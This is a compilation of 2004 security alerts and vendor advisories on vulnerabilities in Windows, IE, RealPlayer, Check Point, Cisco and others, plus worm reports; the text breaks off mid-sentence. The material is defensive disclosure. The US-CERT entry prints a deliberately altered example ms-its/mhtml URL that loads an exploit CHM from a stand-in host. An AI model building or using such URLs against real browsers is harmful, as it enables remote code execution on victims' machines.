Security Alert, December 20, 2004

Multiple Vulnerabilities Can Result in Arbitrary Code Execution
   Microsoft announced multiple vulnerabilities that could result in
the execution of arbitrary code on vulnerable systems. The
vulnerabilities affect HyperTerminal, Wordpad, Microsoft Internet
Explorer (IE), DHCP, and WINS. The company has released patches to
correct the problems. For complete details about these
vulnerabilities, read the articles on the Security Administrator Web
site.

Security Alert, November 24, 2004

Buffer Overflow in DMS POP3 Server
   Reed Arvin discovered that a vulnerability exists in Digital
Mapping Systems (DMS) POP3 Server version 1.5.3 build 37 that could
result in the remote execution of arbitrary code on the vulnerable
system. A buffer overflow occurs during the POP3 authentication
process when an overly long username is supplied. The buffer overflow
could let a remote attacker cause the program to execute arbitrary
code. The vendor, DMS, has released a bulletin and patch to address
this vulnerability.
   http://www.windowsitpro.com/article/articleid/44602/44602.html
 

Security Alert, November 17, 2004

Denial of Service in Kerio Personal Firewall 4.1.1
   eEye Digital Security discovered a Denial of Service (DoS)
vulnerability in Kerio Personal Firewall 4.1.1 and earlier versions.
The vulnerability lets a remote attacker render a system inoperative
with one packet. Physical access is required to bring an affected
system out of this frozen state. Kerio Technologies has released a
security advisory regarding this vulnerability and recommends that
affected users immediately upgrade to version 4.12
   http://www.windowsitpro.com/article/articleid/44505/44505.html
 

Security Alert, November 16, 2004

Denial of Service (DoS) in Software602's 602LAN SUITE
   Luigi Auriemma discovered that multiple Denial of Service (DoS)
vulnerabilities exist in Software602's 602LAN SUITE version
2004.0.04.0909 and earlier versions. Software602 advises users to
upgrade to 602LAN SUITE version 2004.0.04.1104 or later.
   http://www.windowsitpro.com/article/articleid/44506/44506.html
 

Security Alert, November 2, 2004

Arbitrary Code Execution in PuTTY for Windows
   iDEFENSE discovered that a vulnerability in the Telnet/Secure Shell
(SSH) program PuTTY could result in the remote execution of arbitrary
code on the vulnerable system. This vulnerability is a result of
insufficient bounds checking on SSH2_MSG_DEBUG packets. The stringlen
parameter obtains a user-supplied value by reading in an integer from
an offset in the packet data. Signedness problems cause the stringlen
value to be incorrectly checked. The author, Simon Tatham, has
released PuTTY 0.56 to address this vulnerability.
   http://www.windowsitpro.com/article/articleid/44358/44358.html
 

Security Alert, October 28, 2004

Arbitrary Code-Execution Vulnerability in RealPlayer
   eEye Digital Security discovered that a vulnerability in RealPlayer
could result in the remote execution of arbitrary code on the
vulnerable system. When an .rjs file containing a long filename
(larger than about 0x8000 bytes) is opened, either in RealPlayer or
through a Web browser, a stack-based buffer overflow occurs, allowing
an exception-handler record to be overwritten and the Execution
Instruction Point (EIP) to be hijacked. The vendor, RealNetworks, has
released a patch (available via the Check for Update menu item under
Tools on the RealPlayer menu bar) to address this vulnerability.
   http://www.windowsitpro.com/article/articleid/44359/44359.html
 

Security Alert, October 20, 2004

Denial of Service Vulnerability in Microsoft WebDAV XML Message
Handler
   Amit Klein and Sanctum discovered that a vulnerability in the WWW
Distributed Authoring and Versioning (WebDAV) XML Message Handler
could result in a Denial of Service (DoS) condition on the vulnerable
system. A potential attacker could exploit this vulnerability by
sending a specially crafted WebDAV request to a server that's running
Microsoft IIS and WebDAV, which could cause WebDAV to consume all
available memory and CPU time on an affected server. The IIS service
would have to be restarted to restore functionality. Microsoft has
released bulletin MS04-030, "Vulnerability in WebDAV XML Message
Handler Could Lead to a Denial of Service (824151)," to address this
vulnerability and recommends that affected users apply the appropriate
patch listed in the bulletin.
   http://www.windowsitpro.com/article/articleid/44228/44228.html

Arbitrary Code-Execution Vulnerability in Microsoft NetDDE Services
   John Heasman of Next Generation Security Software discovered that a
vulnerability in the Network Dynamic Data Exchange (NetDDE) services
could result in the arbitrary execution of code on the vulnerable
system. This vulnerability is a result of an unchecked buffer, and a
potential attacker who successfully exploited the vulnerability could
take complete control of an affected system. Microsoft has released
bulletin MS04-031, "Vulnerability in NetDDE Could Allow Remote Code
Execution (841533)," to address this vulnerability and recommends that
affected users apply the appropriate patch listed in the bulletin.
   http://www.windowsitpro.com/article/articleid/44229/44229.html

Denial of Service in Windows NT 4.0
   BindView discovered that a vulnerability in NT 4.0's remote
procedure call (RPC) runtime library could result in a Denial of
Service (DoS) condition or the leakage of active memory content.
Microsoft has released bulletin MS04-029, "Vulnerability in RPC
Runtime Library Could Allow Information Disclosure and Denial of
Service (873350)," to address this vulnerability and recommends that
affected users apply the appropriate patch listed in the bulletin.
   http://www.windowsitpro.com/article/articleid/44227/44227.html

Security Alert, October 12, 2004

Modify Your ASP.NET Applications for Added Security
   Microsoft recently published the article "Programmatically check
for canonicalization issues with ASP.NET" (887459), which recommends
program-code adjustments for applications that use ASP.NET. The
changes will help strengthen overall security to prevent intruders
from gaining access to files that they shouldn't be able to access. In
particular, the article offers code samples that you can use to modify
your applications to filter URLs that contain unexpected characters as
a result of a flaw in ASP.NET's canonicalization routines.
   http://support.microsoft.com/?kbid=887459

 

Security Alert, October 7, 2004

Arbitrary Code-Execution Vulnerability in RealPlayer
   eEye Digital Security discovered that a vulnerability in RealPlayer
could let a remote attacker reliably overwrite heap memory with
arbitrary data and execute arbitrary code within the user security
context. This specific flaw exists within the pnen3260.dll file that
RealPlayer uses. By specially crafting a malformed .rm movie file
along with a Synchronized Multimedia Integration Language (SMIL) file,
a direct heap overwrite is triggered and reliable code execution is
then possible. RealNetworks has released a patch for this
vulnerability, which is also available via the Updates section of the
affected application.
   http://www.windowsitpro.com/article/articleid/44143/44143.html
 

Security Alert, June 9, 2004

Arbitrary Remote Code Execution in WildTangent Web Driver 4.0
   NGSSoftware discovered that a vulnerability in WildTangent Web
Driver 4.0 could result in arbitrary remote code execution on the
vulnerable system. You could cause a number of buffer overruns within
the WildTangent package, namely within the WTHoster and WebDriver
modules, by using any method that takes a filename as a parameter. You
can obtain more information about this vulnerability on the
discoverer's Web site. WildTangent has released version 4.1, which
isn't vulnerable to this condition.
   http://secadministrator.com/articles/index.cfm?articleid=42871

6/8/04
MS04-016 - Vulnerability in DirectPlay Could Allow Denial of Service (839643)

              - Affected Software:
                - Windows 2000 Service Pack 2
                - Windows 2000 Service Pack 3
                - Windows 2000 Service Pack 4
                - Windows XP and Windows XP Service Pack 1
                - Windows XP 64-Bit Edition Service Pack 1
                - Windows XP 64-Bit Edition Version 2003
                - Windows Server 2003
                - Windows Server 2003 64-Bit Edition
                - DirectX Versions 7.0 and later

              - Review the FAQ section of bulletin MS04-O16 for
                information about these operating systems:
                - Microsoft Windows 98
                - Microsoft Windows 98 Second Edition (SE)
                - Microsoft Windows Millennium Edition (ME)

              - Impact: Denial of Service
              - Version Number: 1.0

     MS04-017 - Vulnerability in Crystal Reports Web Viewer Could Allow Information Disclosure and Denial of Service (842689)

              - Affected Software:
                 - Visual Studio .NET 2003
                 - Outlook 2003 with Business Contact Manager
                 - Microsoft Business Solutions CRM 1.2.

              - Impact: Information Disclosure and Denial of Service
              - Version Number: 1.0

 

Security Alert, May 25, 2004

Denial of Service in Internet Explorer 6.0 SP1
   Mike Mauler discovered that a vulnerability in Internet Explorer
(IE) 6.0 Service Pack 1 (SP1) could result in a Denial of Service
(DoS) condition. By using a malformed HTML page containing JavaScript
code with a specially crafted META tag, a potential attacker could
cause IE to terminate with an access violation. Microsoft hasn't
released a fix or bulletin that addresses this vulnerability.
   http://secadministrator.com/articles/index.cfm?articleid=42733
 

Buffer-Overrun Vulnerability in Check Point VPN-1

Security Alert, May 14, 2004

   A buffer-overrun vulnerability in Check Point VPN products could
let a potential attacker compromise a Check Point VPN-1 gateway. An
Internet Security Association and Key Management Protocol (ISAKMP)
vulnerability has been discovered that affects Check Point VPN-1
products during negotiations of a VPN tunnel. Check Point customers
who don't use remote access VPNs or gateway-to-gateway VPNs or who've
upgraded to current product versions (i.e., VPN-1/FireWall-1 R55
HFA-03, R54 HFA-410, and NG FP3 HFA-325; and VPN-1
SecuRemote/SecureClient R56) aren't affected by this vulnerability.
Check Point has released the bulletin "ISAKMP Vulnerability" to
address this vulnerability and recommends that affected users
immediately apply the appropriate patch listed in the bulletin.
   http://secadministrator.com/articles/index.cfm?articleid=42617

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Vulnerability in Internet Explorer ITS Protocol Handler

   Original release date: April 8, 2004
   Last revised: --
   Source: US-CERT

Systems Affected

     * Microsoft Windows systems running Internet Explorer

Overview

   A cross-domain scripting vulnerability in Microsoft Internet Explorer
   (IE) could allow an attacker to execute arbitrary code with the
   privileges of the user running IE. The attacker could also read and
   manipulate data on web sites in other domains or zones.

I. Description

   There is a cross-domain scripting vulnerability in the way ITS
   protocol handlers determine the security domain of an HTML component
   stored in a Compiled HTML Help (CHM) file. The HTML Help system
   "...uses the underlying components of Microsoft Internet Explorer to
   display help content. It supports HTML, ActiveX, Java, [and] scripting
   languages (JScript, and Microsoft Visual Basic Scripting Edition)."
   CHM files use the InfoTech Storage (ITS) format to store components
   such as HTML files, graphic files, and ActiveX objects. IE provides
   several protocol handlers that can access ITS files and individual CHM
   components: its:, ms-its:, ms-itss:, and mk:@MSITStore:. IE also has
   the ability to access parts of MIME Encapsulation of Aggregate HTML
   Documents (MHTML) using the mhtml: protocol handler.

   When IE references an inaccessible or non-existent MHTML file using
   the ITS and mhtml: protocols, the ITS protocol handlers can access a
   CHM file from an alternate source. IE incorrectly treats the CHM file
   as if it were in the same domain as the unavailable MHTML file. Using
   a specially crafted URL, an attacker can cause arbitrary script in a
   CHM file to be executed in a different domain, violating the
   cross-domain security model.

   Any programs that use the WebBrowser ActiveX control or the IE HTML
   rendering engine (MSHTML) may be affected by this vulnerability.
   Internet Explorer, Outlook, and Outlook Express are all examples of
   such programs. Any programs, including other web browsers, that use
   the IE protocol handlers (URL monikers) could function as attack
   vectors. Also, due to the way that IE determines MIME types, HTML and
   CHM files may not have the expected file name extensions (.htm/.html
   and .chm respectively).

   NOTE: Using an alternate web browser may not mitigate this
   vulnerability. It may be possible for a web browser other than IE on a
   Windows system to invoke IE to handle ITS protocol URLs.

   US-CERT is tracking this issue as VU#323070. This reference number
   corresponds to CVE candidate CAN-2004-0380.

II. Impact

   By convincing a victim to view an HTML document such as a web page or
   HTML email message, an attacker could execute script in a different
   security domain than the one containing the attacker's document. By
   causing script to be run in the Local Machine Zone, the attacker could
   execute arbitrary code with the privileges of the user running IE. The
   attacker could also read or modify data in other web sites (including
   reading cookies or content and modifying or creating content).

   Publicly available exploit code exists for this vulnerability. US-CERT
   has monitored incident reports that indicate that this vulnerability
   is being exploited. The Ibiza trojan, variants of W32/Bugbear, and
   BloodHound.Exploit.6 are some example of malicious code that exploit
   this vulnerability. It is important to note that any arbitrary
   executable payload could be delivered via this vulnerability, and
   different anti-virus vendors may identify malicious code with
   different names.

   A malicious web site or email message may contain HTML similar to the
   following:

     ms-_its:mhtml:file://C:\nosuchfile_mht!http://www.example.com//expl
     oit_chm::exploit_html

     (This URL is intentionally modified to avoid detection by
     anti-virus software.)

   In this example, HTML and script in exploit.html will be executed in
   the security context of the Local Machine Zone. It is common practice
   for exploit.html to either contain or download an executable payload
   such as a backdoor, trojan horse, virus, bot, or other malicious code.

   Note that it is possible to encode a URL in an attempt to bypass HTTP
   content inspection or anti-virus software.

III. Solution

   Currently, there is no complete solution for this vulnerability. Until
   a patch is available, consider the workarounds listed below.
   Disable ITS protocol handlers

   Disabling ITS protocol handlers appears to prevent exploitation of
   this vulnerability. Delete or rename the following registry keys:

     HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\{ms-its,ms-it
     ss,its,mk}

   Disabling these protocol handlers will significantly reduce the
   functionality of the Windows Help system and may have other unintended
   consequences. Plan to undo these changes after patches have been
   tested and installed. Follow good Internet security practices

   These recommended security practices will help to reduce exposure to
   attacks and mitigate the impact of cross-domain vulnerabilities.

     * Disable Active scripting and ActiveX controls

       NOTE: Disabling Active scripting and ActiveX controls will not
       prevent the exploitation of this vulnerability.

       Disabling Active scripting and ActiveX controls in the Internet
       and Local Machine Zones may stop certain types of attacks and will
       prevent exploitation of different cross-domain vulnerabilities.

       Disable Active scripting and ActiveX controls in any zones used to
       read HTML email.

       Disabling Active scripting and ActiveX controls in the Local
       Machine Zone will prevent malicious code that requires Active
       scripting and ActiveX controls from running. Changing these
       settings may reduce the functionality of scripts, applets, Windows
       components, or other applications. See Microsoft Knowledge Base
       Article 833633 for detailed information about security settings
       for the Local Machine Zone. Note that Service Pack 2 for Windows
       XP includes these changes.

     * Do not follow unsolicited links

       Do not click on unsolicited URLs received in email, instant
       messages, web forums, or Internet relay chat (IRC) channels.

     * Maintain updated anti-virus software

       Anti-virus software with updated virus definitions may identify
       and prevent some exploit attempts. Variations of exploits or
       attack vectors may not be detected. Do not rely solely on
       anti-virus software to defend against this vulnerability. More
       information about viruses and anti-virus vendors is available on
       the US-CERT Computer Virus Resources page.

Appendix B. References

     * Vulnerability Note VU#323070 -
       <http://www.kb.cert.org/vuls/id/323070>

     * US-CERT Computer Virus Resources -
       <http://www.us-cert.gov/other_sources/viruses.html>

     * CVE CAN-2004-0380 -
       <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0380>

     * Introduction to URL Security Zones -
       <http://msdn.microsoft.com/workshop/security/szone/overview/overvi
       ew.asp>

     * About Cross-Frame Scripting and Security -
       <http://msdn.microsoft.com/workshop/author/om/xframe_scripting_sec
       urity.asp>

     * MIME Type Determination in Internet Explorer -
       <http://msdn.microsoft.com/workshop/networking/moniker/overview/ap
       pendix_a.asp>

     * URL Monikers -
       <http://msdn.microsoft.com/workshop/networking/moniker/monikers.as
       p>

     * Asynchronous Pluggable Protocols -
       <http://msdn.microsoft.com/workshop/networking/pluggable/pluggable
       .asp>

     * Microsoft HTML Help 1.4 SDK -
       <http://msdn.microsoft.com/library/en-us/htmlhelp/html/vsconHH1Sta
       rt.asp>

     * Microsoft Knowledge Base Article 182569 -
       <http://support.microsoft.com/default.aspx?scid=182569>

     * Microsoft Knowledge Base Article 174360 -
       <http://support.microsoft.com/default.aspx?scid=174360>

     * Microsoft Knowledge Base Article 833633 -
       <http://support.microsoft.com/default.aspx?scid=833633>

     * Windows XP Service Pack 2 Technical Preview -
       <http://www.microsoft.com/technet/prodtechnol/winxppro/sp2preview.
       mspx >

     * AusCERT Update AU-2004.007 - <http://www.auscert.org.au/3990>
     _________________________________________________________________

   This vulnerability was reported by Thor Larholm.
     _________________________________________________________________

   Feedback can be directed to the author: Art Manion.
     _________________________________________________________________

   Copyright 2004 Carnegie Mellon University.

   Terms of use:

<http://www.us-cert.gov/legal.html>

   Revision History

   April 8, 2004: Initial release
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQFAdbqQXlvNRxAkFWARAtfuAKD0NGSDWbtITNqXKmZk7qcbJD/h2QCfRlU/
sWme3VvhRbvk9KjNUNyTsbY=
=kL0G
-----END PGP SIGNATURE-----
 
Cisco Security Notice: Exploit for Multiple Cisco Vulnerabilities
Document ID: 50220
Revision 1.0
For Public Release 2004 March 27 19:30 UTC

--------------------------------------------------------------------------------

Summary
Proof-of-concept code has been publicly released by an external group that exploits multiple previous vulnerabilities in various Cisco products.

Details
Proof-of-concept code has been publicly released that exploits multiple previous vulnerabilities in various Cisco products. The following list of vulnerabilities taken verbatim from the exploit code are affected. Included after each is a URL which may be referenced for more information regarding each vulnerability where Cisco has previously released a security advisory or response to address the issue. Customers should take steps to ensure that they have addressed each of these either via a software upgrade or workarounds in place as appropriate in order to mitigate any risk from this new exploit code.

Cisco 677/678 Telnet Buffer Overflow Vulnerability

CBOS - Improving Resilience to Denial-of-Service Attacks

http://www.cisco.com/warp/public/707/CBOS-DoS.shtml

Cisco IOS Router Denial of Service Vulnerability

Cisco IOS HTTP Server Vulnerability

http://www.cisco.com/warp/public/707/ioshttpserver-pub.shtml

Cisco IOS HTTP Auth Vulnerability

IOS HTTP Authorization Vulnerability

http://www.cisco.com/warp/public/707/IOS-httplevel-pub.html

Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability

IOS HTTP Authorization Vulnerability

http://www.cisco.com/warp/public/707/IOS-httplevel-pub.html

Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability

Cisco Catalyst SSH Protocol Mismatch Vulnerability

http://www.cisco.com/warp/public/707/catalyst-ssh-protocolmismatch-pub.shtml

Cisco 675 Web Administration Denial of Service Vulnerability

Cisco is currently researching this vulnerability further. Mitigation methods have been available for some time such as setting the Web server to listen on a different port:

"Code Red" Worm - Customer Impact

http://www.cisco.com/warp/public/707/cisco-code-red-worm-pub.shtml#workarounds

and through bugs resolved in the following advisory where the Web server under Cisco CBOS was enabled by default and listening on port 80 even when the Web server was not configured.

CBOS Web-based Configuration Utility Vulnerability

http://www.cisco.com/warp/public/707/cisco-cbos-webserver-pub.shtml

Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability

Catalyst 3500 Issue

Report: http://www.securityfocus.com/archive/1/141471 Cisco Response: http://www.securityfocus.com/archive/1/144655

Cisco IOS Software HTTP Request Denial of Service Vulnerability

Cisco IOS HTTP Server Query Vulnerability

http://www.cisco.com/warp/public/707/ioshttpserverquery-pub.shtml

Cisco 514 UDP Flood Denial of Service Vulnerability

A Vulnerability in IOS Firewall Feature Set

http://www.cisco.com/warp/public/707/IOS-cbac-dynacl-pub.shtml

Workarounds
Possible workarounds for each of the vulnerabilities may be found in the advisories referenced in the Details section.

Status of This Notice: INTERIM
This is an interim notice. Although Cisco cannot guarantee the accuracy of all statements in this notice, all of the facts have been checked to the best of our ability. Cisco does not anticipate issuing updated versions of this notice. Should there be a change in the facts, Cisco may update this notice.

A stand-alone copy or paraphrase of the text of this security notice that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors.

Revision History
Revision 1.0
2004-March-26
Initial public release.

Cisco Security Procedures
Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/warp/public/707/sec_incident_response.shtml. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt.


--------------------------------------------------------------------------------


All contents are Copyright © 1992-2004 Cisco Systems, Inc. All rights reserved. Important Notices and Privacy Statement.
--------------------------------------------------------------------------------
Updated: Mar 27, 2004 Document ID: 50220

--------------------------------------------------------------------------------
 

Title: Cisco Security Advisory: Cisco OpenSSL Implementation Vulnerability

URL:
 http://www.cisco.com/en/US/customer/products/products_security_advisory09186a0080207d5f.shtml
(available to registered users)
http://www.cisco.com/en/US/products/products_security_advisory09186a0080207d5f.shtml
(available to non-registered users)

Posted: March 17, 2004

Summary: A new vulnerability in the OpenSSL  implementation for SSL has been announced on March 17, 2004.

An affected network device running an SSL server based on an affected OpenSSL implementation may be
vulnerable to a Denial of Service (DoS) attack. There are workarounds available to mitigate the effects
of this vulnerability on Cisco products in the workaround section of this advisory. Cisco is providing
fixed software, and recommends that customers upgrade to it when it is available.
 

-----BEGIN PGP SIGNED MESSAGE-----

- --------------------------------------------------------------------
Title: Microsoft Office Security Bulletin Summary for
       March 2004
Issued: March 09, 2004
Revised: March 10, 2004
Version Number: 2.0
Bulletin:
http://www.microsoft.com/technet/security/bulletin/offmar04.mspx

- --------------------------------------------------------------------
Reason for Major Revision
=========================
Subsequent to the release of the Office Security Bulletin Summary
for March 2004, the following bulletin has undergone a major
revision increment. Please see the appropriate bulletin section
of this email for more details.

* MS04-009

Summary:
========
Included in this advisory is an update for a newly discovered
vulnerability in Microsoft Office. This vulnerability has been rated
Critical:

** Critical Security Bulletins

    MS04-009 - Vulnerability in Microsoft Outlook Could Allow Code
               Execution (828040)

             - Affected Software:
               - Office XP Service Pack 2 
               - Outlook 2002 Service Pack 2
              
             - Impact: Remote Code Execution
             - Version Number: 1.0


Reason for Major Revision
=========================
Subsequent to the release of this bulletin, it was determined that
this vulnerability could also affect users who do not have the
"Outlook Today" folder home page as their default home page in
Outlook 2002. As a result, Microsoft has re-released this bulletin
with a new severity rating of "critical" to reflect the expanded
attack vector. The update released with the original version of this
security bulletin is effective in protecting from the vulnerability
and users who have applied the update or have installed
Office XP Service Pack 3 do not need to take additional action.
In addition, Microsoft is making available an additional
"client update" for customers on the Microsoft Download Center.
This additional update does not contain new fixes or functionality,
but is instead an additional offering of the update that provides
an alternative for customers.

Update Availability:
===================
An update is available to fix this vulnerability.
For additional information, including Technical Details,
Workarounds, answers to Frequently Asked Questions, and Update
Deployment Information please read the Microsoft Office Security
Bulletin Summary for March at:
http://www.microsoft.com/technet/security/bulletin/offmar04.mspx


Support:
========
Technical support is available from Microsoft Product Support
Services at 1-866-PC SAFETY (1-866-727-2338). There is no
charge for support calls associated with security patches.
International customers can get support from their local Microsoft
subsidiaries. Phone numbers for international support can be found
at: http://support.microsoft.com/common/international.aspx
 
Additional Resources:
=====================
* Microsoft has created a free monthly e-mail newsletter containing
  valuable information to help you protect your network. This
  newsletter provides practical security tips, topical security
  guidance, useful resources and links, pointers to helpful
  community resources, and a forum for you to provide feedback
  and ask security-related questions.
  You can sign up for the newsletter at:

  http://www.microsoft.com/technet/security/secnews/default.mspx

* Join Microsoft's webcast for a live discussion of the technical
  details of the February security bulletins and steps you can take
  to protect your environment. Details about the live webcast
  can be found at:
  http://go.microsoft.com/fwlink/?LinkId=24513

  The on-demand version of the webcast will be available 24 hours
  after the live webcast at:
  http://go.microsoft.com/fwlink/?LinkId=24513

* Protect your PC: Microsoft has provided information on how you
  can help protect your PC at the following locations:

  http://www.microsoft.com/security/protect/

  If you receive an e-mail that claims to be distributing a
  Microsoft security patch, it is a hoax that may be distributing a
  virus. Microsoft does not distribute security patches via e-mail.
  You can learn more about Microsoft's software distribution
  policies here:

  http://www.microsoft.com/technet/security/topics/policy/swdist.mspx

Acknowledgments:
================
Microsoft thanks the following for working with us to protect
customers:

- - iDefense
     (http://www.idefense.com)
- - Jouko Pynnönen
     (http://iki.fi/jouko)

Revisions:
==========
* V1.0 March 09, 2004: Bulletin published.
* V2.0 March 10, 2004: Bulletin updated to reflect on a revised
                        severity rating of Critical and to advise
                        of a new client update.
********************************************************************
Protect your PC: Microsoft has provided information on how you
can help protect your PC at the following locations:
http://www.microsoft.com/security/protect/

If you receive an e-mail that claims to be distributing a
Microsoft security patch, it is a hoax that may be distributing a
virus. Microsoft does not distribute security patches via e-mail.
You can learn more about Microsoft's software distribution
policies here:
http://www.microsoft.com/technet/security/topics/policy/swdist.mspx
********************************************************************
- --------------------------------------------------------------------
THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS
PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT
DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING
THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE.
IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE
LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL
DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN
ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY
FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING
LIMITATION MAY NOT APPLY.
- --------------------------------------------------------------------


-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0.2

iQEVAwUBQE90So0ZSRQxA/UrAQEmyQf/QMoGkqOOoNIQxZuL4eHRYgly8ekVZ2YE
2xHFQO0lScnaRD9kQPmrnrYl1ukuoYm1tWuBhrfPkHmWQPSwh9JZRsOc34HvcXHY
lKrufhLIYdQ/dZqE4OZ3q7r0V11A9KuHNRk2w6wRh/KH9j6mi2LSLh9FB42nshUL
TZ79H4IoACyixj2SXy+xaOwuyusKwjP5wDhK6qXPLZCH1zcBcb+oW05vjEzUWF1E
RnOKTHP33C7S3/gvGj/5XJiYiemm0yiRlLd/27hPiE8Dtg5adofah8SSi7G1VH1u
W3r3JfteSpVpw5L4+0gvCF/38HygB2qbGDvnvfBbkRHgnMARi9hIeg==
=H6ml
-----END PGP SIGNATURE-----



*******************************************************************

You have received this e-mail bulletin because of your subscription to the Microsoft Product Security Notification Service.  For more information on this service, please visit http://www.microsoft.com/technet/security/notify.asp.
 
To verify the digital signature on this bulletin, please download our PGP key at http://www.microsoft.com/technet/security/notify.asp.
 
To unsubscribe from the Microsoft Security Notification Service, please visit the Microsoft Profile Center at http://register.microsoft.com/regsys/pic.asp
 
If you do not wish to use Microsoft Passport, you can unsubscribe from the Microsoft Security Notification Service via email as described below:
Reply to this message with the word UNSUBSCRIBE in the Subject line.
 
For security-related information about Microsoft products, please visit the Microsoft Security Advisor web site at http://www.microsoft.com/security.
 

Security Alert, March 2, 2004

NetSky.D Worm Spreading Rapidly
A new variant of the NetSky worm, NetSky.D, is spreading rapidly.
The worm spreads by sending copies of itself through its own SMTP
engine. Copies of the worm target email addresses harvested by
scanning disk drives (C through Z) of an infected system and network.
NetSky.D tries to disable other worms, such as MyDoom.A and MyDoom.B,
and deletes various registry keys.
http://www.pandasoftware.com/virus_info/encyclopedia/overview.aspx?IdVirus=45205&sind=0
 

Security Alert February 29, 2004

New type of Phishing Attack 2/29/04

There is a new type of MALWARE attack that I have been receiving for the last couple of weeks.  It appears to be a reference to an EBay auction, but it's a bogus auction number, and there appears to be some sort of link involving java script. The IP address that is referenced traces  out to a site on Charter Cable in Wisconsin in at least one case.

What makes this interesting is I have no auctions running now; nor have I auctioned this item!  This item does not even cross reference on Ebay - so I am certain that it's not a reference to a valid auction.

I have not seen this referenced in any alerts or bulletins, but I would think that Ebay (copied) would be all over this.    I have had 2 that were almost identical except for a slight change in wording.  If it's a phishing scam, it's clever, auctioneers would certainly be enticed to check and see why they are receiving email for what looks to be an auction that they are erroneously responsible for.  If it's a worm
attack, I haven't seen this before and it's potentially dangerous. If you are seeing similar messages, please forward the message on to the anti virus vendors and EBay as well for action.
Full text of phishing messages and details available here.

Security Alert, February 27, 2004

Heap Overflow in ISS RealSecure and BlackICE Servers
   Barnaby Jack discovered that a heap-overflow vulnerability in
Internet Security Systems' (IIS's) RealSecure and BlackICE servers can
result in the arbitrary execution of code on the vulnerable server.
This vulnerability is a result of a flaw that exists within the
component that handles the processing of Server Message Block (SMB)
packets. IIS has released patches for the affected servers and
recommends that affected users immediately apply them.
   http://secadministrator.com/articles/index.cfm?articleid=41873

For complete details about this vulnerability, as well as links to
patches, be sure to visit our Web site at the provided URL.
 

Security Alert, February 20, 2004

Arbitrary Code Execution in Checkpoint VPN-1 Server/SecureRemote/
SecureClient
   Mark Dowd and Neel Mehta discovered that a vulnerability in
Checkpoint VPN-1 Server and Client software can result in the
compromise of the vulnerable system. This vulnerability exists because
the product doesn't perform adequate bounds checking, thereby
triggering a simple stack overflow. This vulnerability occurs during
the handling of ISAKMP packets that have large Certificate Request
payloads. During the initial phases of an IKE negotiation, a remote
unauthenticated attacker can take advantage of this problem.
Checkpoint has issued an update about this vulnerability and
recommends that affected users immediately apply the available patch.
   http://secadministrator.com/articles/index.cfm?articleid=41737

Multiple Vulnerabilities in Checkpoint Firewall-1 NG AI and HTTP
Security Server
   Mark Dowd discovered that Checkpoint Firewall-1 NG AI and HTTP
Security Server contain multiple remotely exploitable format-string
vulnerabilities that can result in the compromise of the vulnerable
firewall. Checkpoint has issued an update about these vulnerabilities
and recommends that affected users immediately apply the available
patch.
   http://secadministrator.com/articles/index.cfm?articleid=41736

Multiple Vulnerabilities in RealPlayer and RealOne Player
  Mark Litchfield discovered that RealNetworks' RealOne Player and
RealPlayer contain multiple vulnerabilities, the most serious of which
can result in arbitrary code execution on the vulnerable system. This
vulnerability is a result of a flaw in the way the SurfNOW proxy
server handles long HTTP headers. RealNetworks has issued a notice
about these vulnerabilities and recommends that affected users
immediately apply the available update.
   http://secadministrator.com/articles/index.cfm?articleid=41735
 

February 18, IDG News Service - Experts warn of new NetSy worm variant.
Anti-virus software companies are warning that a new version of the NetSky
e-mail worm is circulating on the Internet. NetSky.B, also known as
Moodown.B, first appeared Wednesday, February 18, and is spreading through
infected e-mail messages and shared network folders. Once installed, NetSky
tries to disable antivirus software, steal e-mail addresses and copy itself
to shared network folders, anti-virus companies said. The new worm is a
modified version of NetSky.A, which appeared on Monday. Like its
predecessor, NetSky.B arrives in e-mail messages that have randomly
generated subject lines such as "something for you," "hello" or "fake." The
worm file is contained in a zipped attachment that also has a randomly
generated name and file type such as "document" "stuff" or "party." Most
copies of the worm appear to be coming from the Netherlands and elsewhere in
Europe. Users are advised to update their anti-virus software as soon as
possible. Source:
http://www.computerworld.com/securitytopics/security/virus/story/0,10801,90264,00.html
 

Denial of Service in WINS

Security Alert, February 12, 2004

   Qualsys discovered that WINS contains a Denial of Service (DoS)
vulnerability. This vulnerability stems from the method that WINS uses
to validate the length of specially crafted packets. On Windows 2003,
this vulnerability could permit an attacker who sends a series of
specially crafted packets to a WINS server to cause the service to
fail. Windows 2000 contains the same vulnerable code, but the DoS
condition isn't present. Microsoft has released security bulletin
MS04-006, "Vulnerability in the Windows Internet Naming Service (WINS)
Could Allow Code Execution (830352)," to address this vulnerability
and recommends that affected users immediately apply the appropriate
patch listed in the bulletin.
   http://secadministrator.com/articles/index.cfm?articleid=41749

Security Alert, February 9, 2004

Multiple Vulnerabilities in Microsoft IE
   Microsoft has reported that Internet Explorer (IE) contains three
vulnerabilities, one of which was discovered by Andreas Sandblad. The
most serious vulnerability can result in the execution of arbitrary
code on the vulnerable computer.
   The first of these three newly discovered vulnerabilities is a
cross-domain security vulnerability in the IE model, which prevents
